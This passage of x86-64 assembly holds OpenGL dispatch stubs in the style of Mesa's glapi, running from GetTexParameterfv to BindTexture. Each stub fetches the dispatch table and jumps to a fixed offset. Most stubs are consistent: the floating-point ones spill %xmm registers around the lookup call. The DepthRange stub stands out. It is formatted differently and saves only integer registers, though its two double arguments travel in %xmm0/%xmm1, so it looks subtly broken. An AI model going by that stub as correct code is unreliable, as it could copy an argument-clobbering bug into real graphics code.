	popq	%rsi
	popq	%rdi
	movq	2256(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f			/* dispatch table not yet initialized */
	movq	2256(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	call	_glapi_get_dispatch
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	2256(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(GetTexParameterfv), .-GL_PREFIX(GetTexParameterfv)
	.p2align	4,,15
	.globl GL_PREFIX(GetTexParameteriv)
	.type GL_PREFIX(GetTexParameteriv), @function
/* Dispatch stub, table offset 2264.  Three integer args (%rdi,%rsi,%rdx)
 * preserved across the lookup call; odd push count keeps %rsp 16-aligned. */
GL_PREFIX(GetTexParameteriv):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	2264(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	call	_x86_64_get_dispatch@PLT
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	2264(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f			/* dispatch table not yet initialized */
	movq	2264(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	call	_glapi_get_dispatch
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	2264(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(GetTexParameteriv), .-GL_PREFIX(GetTexParameteriv)
	.p2align	4,,15
	.globl GL_PREFIX(GetTexLevelParameterfv)
	.type GL_PREFIX(GetTexLevelParameterfv), @function
/* Dispatch stub, table offset 2272.  Four integer args (%rdi-%rcx)
 * preserved; the %rbp push is pure padding so the push count is odd,
 * keeping %rsp 16-byte aligned at the call. */
GL_PREFIX(GetTexLevelParameterfv):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	2272(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	pushq	%rcx
	pushq	%rbp
	call	_x86_64_get_dispatch@PLT
	popq	%rbp
	popq	%rcx
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	2272(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f			/* dispatch table not yet initialized */
	movq	2272(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	pushq	%rcx
	pushq	%rbp
	call	_glapi_get_dispatch
	popq	%rbp
	popq	%rcx
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	2272(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(GetTexLevelParameterfv), .-GL_PREFIX(GetTexLevelParameterfv)
	.p2align	4,,15
	.globl GL_PREFIX(GetTexLevelParameteriv)
	.type GL_PREFIX(GetTexLevelParameteriv), @function
/* Dispatch stub, table offset 2280.  Four integer args (%rdi-%rcx)
 * preserved; %rbp push is alignment padding (odd push count keeps
 * %rsp 16-byte aligned at the call). */
GL_PREFIX(GetTexLevelParameteriv):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	2280(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	pushq	%rcx
	pushq	%rbp
	call	_x86_64_get_dispatch@PLT
	popq	%rbp
	popq	%rcx
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	2280(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f			/* dispatch table not yet initialized */
	movq	2280(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	pushq	%rcx
	pushq	%rbp
	call	_glapi_get_dispatch
	popq	%rbp
	popq	%rcx
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	2280(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(GetTexLevelParameteriv), .-GL_PREFIX(GetTexLevelParameteriv)
	.p2align	4,,15
	.globl GL_PREFIX(IsEnabled)
	.type GL_PREFIX(IsEnabled), @function
/* Dispatch stub, table offset 2288.  One integer arg (%rdi) preserved
 * across the lookup call; the single push keeps %rsp 16-aligned. */
GL_PREFIX(IsEnabled):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	2288(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	call	_x86_64_get_dispatch@PLT
	popq	%rdi
	movq	2288(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f			/* dispatch table not yet initialized */
	movq	2288(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	call	_glapi_get_dispatch
	popq	%rdi
	movq	2288(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(IsEnabled), .-GL_PREFIX(IsEnabled)
	.p2align	4,,15
	.globl GL_PREFIX(IsList)
	.type GL_PREFIX(IsList), @function
/* Dispatch stub, table offset 2296.  One integer arg (%rdi) preserved
 * across the lookup call; the single push keeps %rsp 16-aligned. */
GL_PREFIX(IsList):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	2296(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	call	_x86_64_get_dispatch@PLT
	popq	%rdi
	movq	2296(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f			/* dispatch table not yet initialized */
	movq	2296(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	call	_glapi_get_dispatch
	popq	%rdi
	movq	2296(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(IsList), .-GL_PREFIX(IsList)
.p2align 4,,15
.globl GL_PREFIX(DepthRange)
.type GL_PREFIX(DepthRange), @function
GL_PREFIX(DepthRange):
#if defined(GLX_USE_TLS)
call _x86_64_get_dispatch@PLT
movq 2304(%rax), %r11
jmp *%r11
#elif defined(PTHREADS)
pushq %rdi
pushq %rsi
pushq %rbp
call _x86_64_get_dispatch@PLT
popq %rbp
popq %rsi
popq %rdi
movq 2304(%rax), %r11
jmp *%r11
#else
movq _glapi_Dispatch(%rip), %rax
testq %rax, %rax
je 1f
movq 2304(%rax), %r11
jmp *%r11
1:
pushq %rdi
pushq %rsi
pushq %rbp
call _glapi_get_dispatch
popq %rbp
popq %rsi
popq %rdi
movq 2304(%rax), %r11
jmp *%r11
#endif /* defined(GLX_USE_TLS) */
.size GL_PREFIX(DepthRange), .-GL_PREFIX(DepthRange)
	.p2align	4,,15
	.globl GL_PREFIX(Frustum)
	.type GL_PREFIX(Frustum), @function
/* Dispatch stub, table offset 2312.  Six FP args spilled from
 * %xmm0-%xmm5 into a 56-byte frame (48 bytes spill + 8 pad keeps
 * %rsp 16-byte aligned at the call) across the dispatch lookup. */
GL_PREFIX(Frustum):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	2312(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	subq	$56, %rsp
	movq	%xmm0, (%rsp)
	movq	%xmm1, 8(%rsp)
	movq	%xmm2, 16(%rsp)
	movq	%xmm3, 24(%rsp)
	movq	%xmm4, 32(%rsp)
	movq	%xmm5, 40(%rsp)
	call	_x86_64_get_dispatch@PLT
	movq	40(%rsp), %xmm5
	movq	32(%rsp), %xmm4
	movq	24(%rsp), %xmm3
	movq	16(%rsp), %xmm2
	movq	8(%rsp), %xmm1
	movq	(%rsp), %xmm0
	addq	$56, %rsp
	movq	2312(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f			/* dispatch table not yet initialized */
	movq	2312(%rax), %r11
	jmp	*%r11
1:
	subq	$56, %rsp
	movq	%xmm0, (%rsp)
	movq	%xmm1, 8(%rsp)
	movq	%xmm2, 16(%rsp)
	movq	%xmm3, 24(%rsp)
	movq	%xmm4, 32(%rsp)
	movq	%xmm5, 40(%rsp)
	call	_glapi_get_dispatch
	movq	40(%rsp), %xmm5
	movq	32(%rsp), %xmm4
	movq	24(%rsp), %xmm3
	movq	16(%rsp), %xmm2
	movq	8(%rsp), %xmm1
	movq	(%rsp), %xmm0
	addq	$56, %rsp
	movq	2312(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(Frustum), .-GL_PREFIX(Frustum)
	.p2align	4,,15
	.globl GL_PREFIX(LoadIdentity)
	.type GL_PREFIX(LoadIdentity), @function
/* Dispatch stub, table offset 2320.  No register args; the %rbp
 * push/pop is pure padding to keep %rsp 16-aligned at the call. */
GL_PREFIX(LoadIdentity):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	2320(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rbp
	call	_x86_64_get_dispatch@PLT
	popq	%rbp
	movq	2320(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f			/* dispatch table not yet initialized */
	movq	2320(%rax), %r11
	jmp	*%r11
1:
	pushq	%rbp
	call	_glapi_get_dispatch
	popq	%rbp
	movq	2320(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(LoadIdentity), .-GL_PREFIX(LoadIdentity)
	.p2align	4,,15
	.globl GL_PREFIX(LoadMatrixf)
	.type GL_PREFIX(LoadMatrixf), @function
/* Dispatch stub, table offset 2328.  One pointer arg (%rdi) preserved
 * across the lookup call; the single push keeps %rsp 16-aligned. */
GL_PREFIX(LoadMatrixf):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	2328(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	call	_x86_64_get_dispatch@PLT
	popq	%rdi
	movq	2328(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f			/* dispatch table not yet initialized */
	movq	2328(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	call	_glapi_get_dispatch
	popq	%rdi
	movq	2328(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(LoadMatrixf), .-GL_PREFIX(LoadMatrixf)
	.p2align	4,,15
	.globl GL_PREFIX(LoadMatrixd)
	.type GL_PREFIX(LoadMatrixd), @function
/* Dispatch stub, table offset 2336.  One pointer arg (%rdi) preserved
 * across the lookup call; the single push keeps %rsp 16-aligned. */
GL_PREFIX(LoadMatrixd):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	2336(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	call	_x86_64_get_dispatch@PLT
	popq	%rdi
	movq	2336(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f			/* dispatch table not yet initialized */
	movq	2336(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	call	_glapi_get_dispatch
	popq	%rdi
	movq	2336(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(LoadMatrixd), .-GL_PREFIX(LoadMatrixd)
	.p2align	4,,15
	.globl GL_PREFIX(MatrixMode)
	.type GL_PREFIX(MatrixMode), @function
/* Dispatch stub, table offset 2344.  One integer arg (%rdi) preserved
 * across the lookup call; the single push keeps %rsp 16-aligned. */
GL_PREFIX(MatrixMode):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	2344(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	call	_x86_64_get_dispatch@PLT
	popq	%rdi
	movq	2344(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f			/* dispatch table not yet initialized */
	movq	2344(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	call	_glapi_get_dispatch
	popq	%rdi
	movq	2344(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(MatrixMode), .-GL_PREFIX(MatrixMode)
	.p2align	4,,15
	.globl GL_PREFIX(MultMatrixf)
	.type GL_PREFIX(MultMatrixf), @function
/* Dispatch stub, table offset 2352.  One pointer arg (%rdi) preserved
 * across the lookup call; the single push keeps %rsp 16-aligned. */
GL_PREFIX(MultMatrixf):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	2352(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	call	_x86_64_get_dispatch@PLT
	popq	%rdi
	movq	2352(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f			/* dispatch table not yet initialized */
	movq	2352(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	call	_glapi_get_dispatch
	popq	%rdi
	movq	2352(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(MultMatrixf), .-GL_PREFIX(MultMatrixf)
	.p2align	4,,15
	.globl GL_PREFIX(MultMatrixd)
	.type GL_PREFIX(MultMatrixd), @function
/* Dispatch stub, table offset 2360.  One pointer arg (%rdi) preserved
 * across the lookup call; the single push keeps %rsp 16-aligned. */
GL_PREFIX(MultMatrixd):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	2360(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	call	_x86_64_get_dispatch@PLT
	popq	%rdi
	movq	2360(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f			/* dispatch table not yet initialized */
	movq	2360(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	call	_glapi_get_dispatch
	popq	%rdi
	movq	2360(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(MultMatrixd), .-GL_PREFIX(MultMatrixd)
	.p2align	4,,15
	.globl GL_PREFIX(Ortho)
	.type GL_PREFIX(Ortho), @function
/* Dispatch stub, table offset 2368.  Six FP args spilled from
 * %xmm0-%xmm5 into a 56-byte frame (48 spill + 8 pad keeps %rsp
 * 16-byte aligned at the call) across the dispatch lookup. */
GL_PREFIX(Ortho):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	2368(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	subq	$56, %rsp
	movq	%xmm0, (%rsp)
	movq	%xmm1, 8(%rsp)
	movq	%xmm2, 16(%rsp)
	movq	%xmm3, 24(%rsp)
	movq	%xmm4, 32(%rsp)
	movq	%xmm5, 40(%rsp)
	call	_x86_64_get_dispatch@PLT
	movq	40(%rsp), %xmm5
	movq	32(%rsp), %xmm4
	movq	24(%rsp), %xmm3
	movq	16(%rsp), %xmm2
	movq	8(%rsp), %xmm1
	movq	(%rsp), %xmm0
	addq	$56, %rsp
	movq	2368(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f			/* dispatch table not yet initialized */
	movq	2368(%rax), %r11
	jmp	*%r11
1:
	subq	$56, %rsp
	movq	%xmm0, (%rsp)
	movq	%xmm1, 8(%rsp)
	movq	%xmm2, 16(%rsp)
	movq	%xmm3, 24(%rsp)
	movq	%xmm4, 32(%rsp)
	movq	%xmm5, 40(%rsp)
	call	_glapi_get_dispatch
	movq	40(%rsp), %xmm5
	movq	32(%rsp), %xmm4
	movq	24(%rsp), %xmm3
	movq	16(%rsp), %xmm2
	movq	8(%rsp), %xmm1
	movq	(%rsp), %xmm0
	addq	$56, %rsp
	movq	2368(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(Ortho), .-GL_PREFIX(Ortho)
	.p2align	4,,15
	.globl GL_PREFIX(PopMatrix)
	.type GL_PREFIX(PopMatrix), @function
/* Dispatch stub, table offset 2376.  No register args; the %rbp
 * push/pop is pure padding to keep %rsp 16-aligned at the call. */
GL_PREFIX(PopMatrix):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	2376(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rbp
	call	_x86_64_get_dispatch@PLT
	popq	%rbp
	movq	2376(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f			/* dispatch table not yet initialized */
	movq	2376(%rax), %r11
	jmp	*%r11
1:
	pushq	%rbp
	call	_glapi_get_dispatch
	popq	%rbp
	movq	2376(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(PopMatrix), .-GL_PREFIX(PopMatrix)
	.p2align	4,,15
	.globl GL_PREFIX(PushMatrix)
	.type GL_PREFIX(PushMatrix), @function
/* Dispatch stub, table offset 2384.  No register args; the %rbp
 * push/pop is pure padding to keep %rsp 16-aligned at the call. */
GL_PREFIX(PushMatrix):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	2384(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rbp
	call	_x86_64_get_dispatch@PLT
	popq	%rbp
	movq	2384(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f			/* dispatch table not yet initialized */
	movq	2384(%rax), %r11
	jmp	*%r11
1:
	pushq	%rbp
	call	_glapi_get_dispatch
	popq	%rbp
	movq	2384(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(PushMatrix), .-GL_PREFIX(PushMatrix)
	.p2align	4,,15
	.globl GL_PREFIX(Rotated)
	.type GL_PREFIX(Rotated), @function
/* Dispatch stub, table offset 2392.  Four FP args spilled from
 * %xmm0-%xmm3 into a 40-byte frame (32 spill + 8 pad keeps %rsp
 * 16-byte aligned at the call) across the dispatch lookup. */
GL_PREFIX(Rotated):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	2392(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	subq	$40, %rsp
	movq	%xmm0, (%rsp)
	movq	%xmm1, 8(%rsp)
	movq	%xmm2, 16(%rsp)
	movq	%xmm3, 24(%rsp)
	call	_x86_64_get_dispatch@PLT
	movq	24(%rsp), %xmm3
	movq	16(%rsp), %xmm2
	movq	8(%rsp), %xmm1
	movq	(%rsp), %xmm0
	addq	$40, %rsp
	movq	2392(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f			/* dispatch table not yet initialized */
	movq	2392(%rax), %r11
	jmp	*%r11
1:
	subq	$40, %rsp
	movq	%xmm0, (%rsp)
	movq	%xmm1, 8(%rsp)
	movq	%xmm2, 16(%rsp)
	movq	%xmm3, 24(%rsp)
	call	_glapi_get_dispatch
	movq	24(%rsp), %xmm3
	movq	16(%rsp), %xmm2
	movq	8(%rsp), %xmm1
	movq	(%rsp), %xmm0
	addq	$40, %rsp
	movq	2392(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(Rotated), .-GL_PREFIX(Rotated)
	.p2align	4,,15
	.globl GL_PREFIX(Rotatef)
	.type GL_PREFIX(Rotatef), @function
/* Dispatch stub, table offset 2400.  Four FP args spilled from
 * %xmm0-%xmm3 into a 40-byte frame (32 spill + 8 pad keeps %rsp
 * 16-byte aligned at the call) across the dispatch lookup. */
GL_PREFIX(Rotatef):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	2400(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	subq	$40, %rsp
	movq	%xmm0, (%rsp)
	movq	%xmm1, 8(%rsp)
	movq	%xmm2, 16(%rsp)
	movq	%xmm3, 24(%rsp)
	call	_x86_64_get_dispatch@PLT
	movq	24(%rsp), %xmm3
	movq	16(%rsp), %xmm2
	movq	8(%rsp), %xmm1
	movq	(%rsp), %xmm0
	addq	$40, %rsp
	movq	2400(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f			/* dispatch table not yet initialized */
	movq	2400(%rax), %r11
	jmp	*%r11
1:
	subq	$40, %rsp
	movq	%xmm0, (%rsp)
	movq	%xmm1, 8(%rsp)
	movq	%xmm2, 16(%rsp)
	movq	%xmm3, 24(%rsp)
	call	_glapi_get_dispatch
	movq	24(%rsp), %xmm3
	movq	16(%rsp), %xmm2
	movq	8(%rsp), %xmm1
	movq	(%rsp), %xmm0
	addq	$40, %rsp
	movq	2400(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(Rotatef), .-GL_PREFIX(Rotatef)
	.p2align	4,,15
	.globl GL_PREFIX(Scaled)
	.type GL_PREFIX(Scaled), @function
/* Dispatch stub, table offset 2408.  Three FP args spilled from
 * %xmm0-%xmm2 into a 24-byte frame (8+24 leaves %rsp 16-byte
 * aligned at the call) across the dispatch lookup. */
GL_PREFIX(Scaled):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	2408(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	subq	$24, %rsp
	movq	%xmm0, (%rsp)
	movq	%xmm1, 8(%rsp)
	movq	%xmm2, 16(%rsp)
	call	_x86_64_get_dispatch@PLT
	movq	16(%rsp), %xmm2
	movq	8(%rsp), %xmm1
	movq	(%rsp), %xmm0
	addq	$24, %rsp
	movq	2408(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f			/* dispatch table not yet initialized */
	movq	2408(%rax), %r11
	jmp	*%r11
1:
	subq	$24, %rsp
	movq	%xmm0, (%rsp)
	movq	%xmm1, 8(%rsp)
	movq	%xmm2, 16(%rsp)
	call	_glapi_get_dispatch
	movq	16(%rsp), %xmm2
	movq	8(%rsp), %xmm1
	movq	(%rsp), %xmm0
	addq	$24, %rsp
	movq	2408(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(Scaled), .-GL_PREFIX(Scaled)
	.p2align	4,,15
	.globl GL_PREFIX(Scalef)
	.type GL_PREFIX(Scalef), @function
/* Dispatch stub, table offset 2416.  Three FP args spilled from
 * %xmm0-%xmm2 into a 24-byte frame (8+24 leaves %rsp 16-byte
 * aligned at the call) across the dispatch lookup. */
GL_PREFIX(Scalef):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	2416(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	subq	$24, %rsp
	movq	%xmm0, (%rsp)
	movq	%xmm1, 8(%rsp)
	movq	%xmm2, 16(%rsp)
	call	_x86_64_get_dispatch@PLT
	movq	16(%rsp), %xmm2
	movq	8(%rsp), %xmm1
	movq	(%rsp), %xmm0
	addq	$24, %rsp
	movq	2416(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f			/* dispatch table not yet initialized */
	movq	2416(%rax), %r11
	jmp	*%r11
1:
	subq	$24, %rsp
	movq	%xmm0, (%rsp)
	movq	%xmm1, 8(%rsp)
	movq	%xmm2, 16(%rsp)
	call	_glapi_get_dispatch
	movq	16(%rsp), %xmm2
	movq	8(%rsp), %xmm1
	movq	(%rsp), %xmm0
	addq	$24, %rsp
	movq	2416(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(Scalef), .-GL_PREFIX(Scalef)
	.p2align	4,,15
	.globl GL_PREFIX(Translated)
	.type GL_PREFIX(Translated), @function
/* Dispatch stub, table offset 2424.  Three FP args spilled from
 * %xmm0-%xmm2 into a 24-byte frame (8+24 leaves %rsp 16-byte
 * aligned at the call) across the dispatch lookup. */
GL_PREFIX(Translated):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	2424(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	subq	$24, %rsp
	movq	%xmm0, (%rsp)
	movq	%xmm1, 8(%rsp)
	movq	%xmm2, 16(%rsp)
	call	_x86_64_get_dispatch@PLT
	movq	16(%rsp), %xmm2
	movq	8(%rsp), %xmm1
	movq	(%rsp), %xmm0
	addq	$24, %rsp
	movq	2424(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f			/* dispatch table not yet initialized */
	movq	2424(%rax), %r11
	jmp	*%r11
1:
	subq	$24, %rsp
	movq	%xmm0, (%rsp)
	movq	%xmm1, 8(%rsp)
	movq	%xmm2, 16(%rsp)
	call	_glapi_get_dispatch
	movq	16(%rsp), %xmm2
	movq	8(%rsp), %xmm1
	movq	(%rsp), %xmm0
	addq	$24, %rsp
	movq	2424(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(Translated), .-GL_PREFIX(Translated)
	.p2align	4,,15
	.globl GL_PREFIX(Translatef)
	.type GL_PREFIX(Translatef), @function
/* Dispatch stub, table offset 2432.  Three FP args spilled from
 * %xmm0-%xmm2 into a 24-byte frame (8+24 leaves %rsp 16-byte
 * aligned at the call) across the dispatch lookup. */
GL_PREFIX(Translatef):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	2432(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	subq	$24, %rsp
	movq	%xmm0, (%rsp)
	movq	%xmm1, 8(%rsp)
	movq	%xmm2, 16(%rsp)
	call	_x86_64_get_dispatch@PLT
	movq	16(%rsp), %xmm2
	movq	8(%rsp), %xmm1
	movq	(%rsp), %xmm0
	addq	$24, %rsp
	movq	2432(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f			/* dispatch table not yet initialized */
	movq	2432(%rax), %r11
	jmp	*%r11
1:
	subq	$24, %rsp
	movq	%xmm0, (%rsp)
	movq	%xmm1, 8(%rsp)
	movq	%xmm2, 16(%rsp)
	call	_glapi_get_dispatch
	movq	16(%rsp), %xmm2
	movq	8(%rsp), %xmm1
	movq	(%rsp), %xmm0
	addq	$24, %rsp
	movq	2432(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(Translatef), .-GL_PREFIX(Translatef)
	.p2align	4,,15
	.globl GL_PREFIX(Viewport)
	.type GL_PREFIX(Viewport), @function
/* Dispatch stub, table offset 2440.  Four integer args (%rdi-%rcx)
 * preserved; %rbp push is alignment padding (odd push count keeps
 * %rsp 16-byte aligned at the call). */
GL_PREFIX(Viewport):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	2440(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	pushq	%rcx
	pushq	%rbp
	call	_x86_64_get_dispatch@PLT
	popq	%rbp
	popq	%rcx
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	2440(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f			/* dispatch table not yet initialized */
	movq	2440(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	pushq	%rsi
	pushq	%rdx
	pushq	%rcx
	pushq	%rbp
	call	_glapi_get_dispatch
	popq	%rbp
	popq	%rcx
	popq	%rdx
	popq	%rsi
	popq	%rdi
	movq	2440(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(Viewport), .-GL_PREFIX(Viewport)
	.p2align	4,,15
	.globl GL_PREFIX(ArrayElement)
	.type GL_PREFIX(ArrayElement), @function
/* Dispatch stub, table offset 2448.  One integer arg (%rdi) preserved
 * across the lookup call; the single push keeps %rsp 16-aligned. */
GL_PREFIX(ArrayElement):
#if defined(GLX_USE_TLS)
	call	_x86_64_get_dispatch@PLT
	movq	2448(%rax), %r11
	jmp	*%r11
#elif defined(PTHREADS)
	pushq	%rdi
	call	_x86_64_get_dispatch@PLT
	popq	%rdi
	movq	2448(%rax), %r11
	jmp	*%r11
#else
	movq	_glapi_Dispatch(%rip), %rax
	testq	%rax, %rax
	je	1f			/* dispatch table not yet initialized */
	movq	2448(%rax), %r11
	jmp	*%r11
1:
	pushq	%rdi
	call	_glapi_get_dispatch
	popq	%rdi
	movq	2448(%rax), %r11
	jmp	*%r11
#endif /* defined(GLX_USE_TLS) */
	.size	GL_PREFIX(ArrayElement), .-GL_PREFIX(ArrayElement)
	.p2align	4,,15
	.globl GL_PREFIX(BindTexture)
	.type GL_PREFIX(BindTexture), @function
/* Dispatch stub, table offset 2456.  Two integer args (%rdi,%rsi)
